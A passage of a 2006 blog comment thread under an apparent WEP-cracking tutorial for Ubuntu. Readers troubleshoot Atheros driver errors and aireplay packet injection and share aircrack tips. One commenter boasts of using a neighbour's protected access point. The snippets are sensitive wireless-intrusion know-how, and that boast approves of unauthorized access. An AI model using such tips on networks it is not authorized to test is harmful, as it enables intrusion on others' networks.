ERROR: Module ath_rate_onoe does not exist in /proc/modules<br>
ERROR: Module wlan is in use by wlan_wep,ath_rate_sample<br>
ERROR: Module ath_hal is in use by ath_rate_sample</p>
<p>I have a D-Link DWL-G650 which runs as ath0, so I’m confused.
</p>
	<p><cite>Comment by dazey — July 6, 2006 @ <a href="#comment-53">9:13 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-54">
			<p>Dazey,<br>
I was stuck getting the same errors as you while using a DWL-G630
(ath0). Ignore the errors and just make sure that you have followed all
of the instructions above including the addition by mcgyver100
(removing modules). Hopefully everything will work OK.
</p>
	<p><cite>Comment by JR — July 7, 2006 @ <a href="#comment-54">4:38 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-55">
			<p>[…] Cracking Wireless Networks with Ubuntu - Great step by step tutorial on cracking WEP Encryption under Ubuntu. […]
</p>
	<p><cite>Pingback by <a href="http://www.johnwiseman.ca/blogging/?p=114" rel="external nofollow">John Wiseman » Blog Archive » Ubuntu Quick Bits</a> — July 7, 2006 @ <a href="#comment-55">7:34 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-57">
			<p>Great
ubuntu-centered tutorial, but you should give credit to the sites whom
you gained the information from. Some people put hundreds of hours of
time in putting this information together that you just copy/pasted
into your own blog.
</p>
	<p><cite>Comment by <a href="http://syserr.com/" rel="external nofollow">alek</a> — July 11, 2006 @ <a href="#comment-57">10:35 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-58">
			<p>i
got to the last part where i type modprobe ath_pci and got the error
message and removed the linux restricted modules except the one stated
and still same error message. has anyone encountered this problem?
</p>
	<p><cite>Comment by <a href="http://www.google.com/" rel="external nofollow">josephhhhhh</a> — July 11, 2006 @ <a href="#comment-58">10:40 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-59">
			<p>[…]
Cracking WEP with Ubuntu (Actually Works) If you need your hand held
through the entire procedure of cracking WEP keys, this is a good
tutorial. (tags: cracking wifi security article linux howto) […]
</p>
	<p><cite>Pingback by <a href="http://www.linkwithreality.com/blog/blog/archives/198.html" rel="external nofollow">Link With Reality Web Log » links for 2006-07-06</a> — July 14, 2006 @ <a href="#comment-59">11:11 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-61">
			<p>Worked here. Thanks. Needs seconds with 200k IV’s, wouldnt work with 150k IV’s.<br>
I had to change “sudo aircrack filename.ivs” to “sudo aircrack filename.cap”.
</p>
	<p><cite>Comment by cesco — July 20, 2006 @ <a href="#comment-61">9:53 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-62">
			<p>I
have a Netgear wg511T with atheros and have followed your guide but
have a few problems, first injection dosent seem to work it just sits
reading packets but never sends any. Is thare a patch or something that
can help because I have looked everywere for help on this. secondly I
have only authinticated once and suddenly it dosent seem to work. does
there need to be a client connected to auth?
</p>
	<p><cite>Comment by judo — July 21, 2006 @ <a href="#comment-62">1:34 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-63">
			<p>[…]
The software runs on Linux, they are all available on the Knoppix Linux
Live CD. And finally, I think you should always use a combination of 2
or more security features. As for what you need, get Aircrack (Includes
Airodump, Aireplay, Aircrack and optional Airdecap for decrypting
WEP/WPA capture files) and get Kismet. Update: Kismet for Windows
(Kiswin32) is available now. Update: There seems to be a more complete
walk through for this over here. [now mirrored] […]
</p>
	<p><cite>Pingback by <a href="http://kalyank.net/wp/?p=88" rel="external nofollow">kalyank.net » Blog Archive » WEP Cracking, the FBI Way</a> — July 22, 2006 @ <a href="#comment-63">2:19 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-70">
			<p>Hi,<br>I
have a D-Link DWL-G650 which i was told supports packet injection fine,
however when running aireplay it just receives packets and does not
send any?, is there something i need to do to make it inject?? i
follwed the guide all the way up till this point
</p>
	<p><cite>Comment by Brent — July 25, 2006 @ <a href="#comment-70">4:37 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-131">
			<p>Great job, webmaster! Nice site.
</p>
	<p><cite>Comment by <a href="http://new-sex-position.mtpic4.info/" rel="external nofollow">Razor</a> — August 6, 2006 @ <a href="#comment-131">6:44 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-150">
			<p>Great instructions !<br>
Writing from a WEP and mac-filter protected AP. Not mine obviously…
</p>
	<p><cite>Comment by Truemmel — August 9, 2006 @ <a href="#comment-150">1:39 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-158">
			<p>Hi Brent,<br>there
must be a regular client connected to the AP. aireplay will then sniff
one of the regular packets, and only then the injection starts.<br>
If there is no no regular client you will have to wait untile one shows up ….
</p>
	<p><cite>Comment by Truemmel — August 11, 2006 @ <a href="#comment-158">11:58 am</a></cite> </p>
	<hr>
	</li>

	<li id="comment-167">
			<p>[…]
Cracking WEP with Ubuntu (Actually Works) (tags: linux ubuntu security
wireless wep wifi hacking cracking atheros tutorials wardriving wlan
networking sysadmin) […]
</p>
	<p><cite>Pingback by <a href="http://uduogah.wordpress.com/2006/08/18/links-for-2006-08-18/" rel="external nofollow">Where Is All This Leading To? » Blog Archive » links for 2006-08-18</a> — August 17, 2006 @ <a href="#comment-167">8:48 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-168">
			<p>[…] Nice tutorial from turkeyfarm. […]
</p>
	<p><cite>Pingback by <a href="http://kalyank.net/wp/?p=16" rel="external nofollow">kalyank.net » Blog Archive » Cracking WEP with Ubuntu (Actually Works)</a> — August 26, 2006 @ <a href="#comment-168">1:43 pm</a></cite> </p>
	<hr>
	</li>

	<li id="comment-170">
			<p>[…] A nice tutorial on cracking WEP Encryption under Ubuntu.read more&nbsp;|&nbsp;digg story […]
</p>
	<p><cite>Pingback by <a href="http://www.allsecuritynews.org/security/cracking-wep-with-ubuntu/" rel="external nofollow">Security » Cracking WEP with Ubuntu</a> — September 1, 2006 @ <a href="#comment-170">4:22 am</a></cite> </p>
	<hr>
	</li>


</ol>

<p>Sorry, the comment form is closed at this time.</p>
		
</div>
<!-- begin footer -->

</div>
</div>
<div id="footer_container_container">
<div id="footer_container">
	<div id="foot_left">
		<div class="footer_text">
			<h4>Featured Post</h4>
			<p></p>
		</div>
	</div>
	<div id="foot_middle_left">
		<div class="footer_text">
			<div class="tile sem_recent"><div class="tile_header"><h4>Recently Posted</h4>
</div><div class="tile_body">October 3, 2006: <br>
<a href="http://www.turkeyfarm.net/blog/2006/10/03/voxing/">Voxing</a><br><br>

September 24, 2006: <br>
<a href="http://www.turkeyfarm.net/blog/2006/09/24/follow-up-on-facebook/">Follow-up on Facebook</a><br><br>

September 23, 2006: <br>
<a href="http://www.turkeyfarm.net/blog/2006/09/23/61/">NYTimes: The Ballad of Big Mike</a><br><br>

September 16, 2006: <br>
<a href="http://www.turkeyfarm.net/blog/2006/09/16/investment-blog-where-is-it/">Investment Blog (Where is it?)</a><br><br>

September 9, 2006: <br>
<a href="http://www.turkeyfarm.net/blog/2006/09/09/why-mark-zuckerberg-should-never-sell-facebook/">Why Mark Zuckerberg Should Never Sell Facebook</a><br><br>

</div></div>		</div>
	</div>
	<div id="foot_middle_right">
		<div class="footer_text">
			
				<h4>Nonsense via (<a href="http://del.icio.us/ba11k/">Del.icio.us</a>)</h4>
			<p>
								<span class="rssLinkListItemTitle"><a href="http://www.forbes.com/2003/10/08/cz_af_1008health.html" title="">Is Sex Necessary? - Forbes.com</a></span><br><br><span class="rssLinkListItemTitle"><a href="http://www.lifeclever.com/2006/10/24/give-your-resume-a-face-lift/" title="">Give your resumé a face lift » LifeClever ;-)</a></span><br><br><span class="rssLinkListItemTitle"><a href="http://www.typorganism.com/asciiomatic/" title="">t.y.p.o.r.g.a.n.i.s.m : ASCII-O-Matic</a></span><br><br><span class="rssLinkListItemTitle"><a href="http://www.betterthanyourboyfriend.com/the-infamous-ghetto-indoor-pool.htm" title="">The Infamous Ghetto Indoor Pool » Tynan is? Better Than Your Boyfriend</a></span><br><br><span class="rssLinkListItemTitle"><a href="http://phpspot.net/php/flickr/" title="">flickr and WEBIMAGER</a></span><br><br><span class="rssLinkListItemTitle"><a href="http://www.shotgunguide.com/" title="">ShotgunGuide.com - Official Rules for Calling Shotgun</a></span><br><br>			</p>
		</div>
	</div>
	<div id="foot_right">
		<div class="footer_text">
			<h4>Search</h4>
   			<label for="s"></label>	
   			<form id="searchform" method="get" action="blog">
					<p><input value="Search..." name="s" id="s" size="13" onclick='s.value=""' type="text">
				<input value="Go" type="submit"></p>
				</form>
			<h4>Blog Entries</h4>
   			<ul><li>
   				<form action="http://www.turkeyfarm.net/blog/index.php" method="get">
   					<select name="cat" class="postform">
	<option value="1">General</option>
	<option value="2">Web</option>
	<option value="3">Movies</option>
	<option value="4">Security</option>
	<option value="5">Government</option>
	<option value="6">Music</option>
	<option value="7">World Cup</option>
	<option value="8">Web Design</option>
	<option value="9">Books</option>
	<option value="10">Games</option>
	<option value="11">Society</option>
</select>
   					<input name="submit" value="Go" type="submit">
   				</form>
   			</li></ul>
			<h4 id="archives">Archives</h4>
 					<ul>
													<li><a href="http://www.turkeyfarm.net/blog/2006/">2006</a></li>
											</ul>
					<br>
					<p style="border: 1px solid ; font-size: 1em; font-weight: bold; text-align: center;"><a href="http://www.itsournet.org/">It's Our Net!</a></p>
		</div>
	</div>

<div id="foot_whole">
	<div class="footer_text_whole">
	
	</div>
</div>
</div>
</div>
<!-- Dynamic Page Served (once) in 1.486 seconds -->
<!-- Cached page served by WP-Cache -->
</body></html>
